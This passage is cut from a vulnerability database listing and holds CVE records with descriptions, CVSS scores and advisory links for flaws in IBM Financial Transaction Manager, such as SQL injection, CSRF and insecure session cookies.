"https://exchange.xforce.ibmcloud.com/vulnerabilities/239708" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM Financial Transaction Manager information disclosure", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43872", "datePublished": "2022-12-20T18:35:34.432Z", "dateReserved": "2022-10-26T15:46:22.827Z", "dateUpdated": "2024-08-03T13:40:06.872Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-5002
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6958504 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/192954 | vdb-entry |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 ≤ |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:22:08.256Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192954" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "lessThan": "3.2.10", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM Financial Transaction Manager 3.2.0 through 3.2.10 could allow an authenticated user to perform unauthorized actions due to improper validation. IBM X-Force ID: 192954." } ], "value": "IBM Financial Transaction Manager 3.2.0 through 3.2.10 could allow an authenticated user to perform unauthorized actions due to improper validation. IBM X-Force ID: 192954." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "602 Client-Side Enforcement of Server-Side Security", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-10T20:04:40.537099Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192954" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM Financial Transaction Manager security bypass", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-5002", "datePublished": "2023-03-01T21:16:40.285Z", "dateReserved": "2019-12-30T00:00:00.000Z", "dateUpdated": "2024-08-04T08:22:08.256Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4743
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/1135173 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/172880 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:40:49.044Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194743-info-disc (172880)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172880" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0" } ] } ], "datePublic": "2019-12-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 172880." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.8, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/UI:R/A:N/S:U/C:L/PR:N/I:N/AV:N/AC:L/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-20T16:25:26", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194743-info-disc (172880)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172880" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-12-19T00:00:00", "ID": "CVE-2019-4743", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 172880." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "N", "PR": "N", "S": "U", "UI": "R" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/1135173", "refsource": "CONFIRM", "title": "IBM Security Bulletin 1135173 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194743-info-disc (172880)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172880" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4743", "datePublished": "2019-12-20T16:25:26.824863Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-17T03:38:16.318Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-1606
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/102049 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=swg22011179 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/132926 | x_refsource_MISC |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.0.0 Version: 3.0.0.1 Version: 3.0.0.2 Version: 3.0.0.3 Version: 3.0.0.4 Version: 3.0.0.5 Version: 3.0.0.6 Version: 3.0.0.7 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T13:39:31.669Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "102049", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/102049" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22011179" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132926" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.0.0" }, { "status": "affected", "version": "3.0.0.1" }, { "status": "affected", "version": "3.0.0.2" }, { "status": "affected", "version": "3.0.0.3" }, { "status": "affected", "version": "3.0.0.4" }, { "status": "affected", "version": "3.0.0.5" }, { "status": "affected", "version": "3.0.0.6" }, { "status": "affected", "version": "3.0.0.7" } ] } ], "datePublic": "2017-12-05T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926." } ], "problemTypes": [ { "descriptions": [ { "description": "Data Manipulation", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-12-12T10:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "102049", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/102049" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22011179" }, { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132926" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2017-12-05T00:00:00", "ID": "CVE-2017-1606", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.0.0" }, { "version_value": "3.0.0.1" }, { "version_value": "3.0.0.2" }, { "version_value": "3.0.0.3" }, { "version_value": "3.0.0.4" }, { "version_value": "3.0.0.5" }, { "version_value": "3.0.0.6" }, { "version_value": "3.0.0.7" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Data Manipulation" } ] } ] }, "references": { "reference_data": [ { "name": "102049", "refsource": "BID", "url": "http://www.securityfocus.com/bid/102049" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22011179", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22011179" }, { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132926", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132926" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2017-1606", "datePublished": "2017-12-11T21:00:00Z", "dateReserved": "2016-11-30T00:00:00", "dateUpdated": "2024-09-16T16:22:54.943Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4905
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6371260 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/191109 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.293Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204905-info-disc (191109)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191109" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow an remote attacker to obtain sensitive information, caused by a man in the middle attack. By SSL striping, an attacker could exploit this vulnerability to obtain sensitive information." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/C:H/PR:N/I:N/A:N/AV:N/AC:H/UI:N/S:U/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-16T20:35:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204905-info-disc (191109)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191109" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-15T00:00:00", "ID": "CVE-2020-4905", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow an remote attacker to obtain sensitive information, caused by a man in the middle attack. By SSL striping, an attacker could exploit this vulnerability to obtain sensitive information." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "H", "AV": "N", "C": "H", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6371260", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6371260 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204905-info-disc (191109)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191109" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4905", "datePublished": "2020-12-16T20:35:28.033402Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T19:30:11.428Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4575
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6594797 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/166801 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 Version: 3.2.9 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:40:47.421Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6594797" }, { "name": "ibm-ftm-cve20194575-sql-injection (166801)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/166801" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.0" }, { "status": "affected", "version": "3.2.9" } ] } ], "datePublic": "2022-06-14T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.9 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 166801." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 4.6, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:L/C:N/S:U/AC:H/I:N/UI:N/AV:N/A:H/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-06-15T15:40:13", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6594797" }, { "name": "ibm-ftm-cve20194575-sql-injection (166801)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/166801" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-06-14T00:00:00", "ID": "CVE-2019-4575", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.0" }, { "version_value": "3.2.9" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.9 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 166801." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "H", "AV": "N", "C": "N", "I": "N", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6594797", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6594797 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6594797" }, { "name": "ibm-ftm-cve20194575-sql-injection (166801)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/166801" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4575", "datePublished": "2022-06-15T15:40:13.093548Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-17T03:23:39.758Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4328
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6255154 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/177839 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:00:07.914Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6255154" }, { "name": "ibm-ftm-cve20204328-sql-injection (177839)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/177839" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-07-31T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 177839." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.5, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AC:L/C:L/S:U/I:L/A:L/UI:N/AV:N/PR:L/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Data Manipulation", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-08-03T12:35:37", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6255154" }, { "name": "ibm-ftm-cve20204328-sql-injection (177839)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/177839" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-07-31T00:00:00", "ID": "CVE-2020-4328", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 177839." } ] }, "impact": { "cvssv3": { "BM": { "A": "L", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Data Manipulation" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6255154", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6255154 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6255154" }, { "name": "ibm-ftm-cve20204328-sql-injection (177839)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/177839" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4328", "datePublished": "2020-08-03T12:35:37.210570Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T22:40:11.170Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4904
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6371260 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/191106 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.096Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204904-csrf (191106)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191106" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.8, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/UI:R/AV:N/AC:L/S:U/PR:N/C:N/A:N/I:L/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Access", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-16T20:35:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204904-csrf (191106)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191106" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-15T00:00:00", "ID": "CVE-2020-4904", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "N", "I": "L", "PR": "N", "S": "U", "UI": "R" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Access" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6371260", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6371260 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204904-csrf (191106)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191106" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4904", "datePublished": "2020-12-16T20:35:27.394820Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T22:30:25.487Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-1758
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://exchange.xforce.ibmcloud.com/vulnerabilities/135859 | x_refsource_MISC | |
http://www.securityfocus.com/bid/103130 | vdb-entry, x_refsource_BID | |
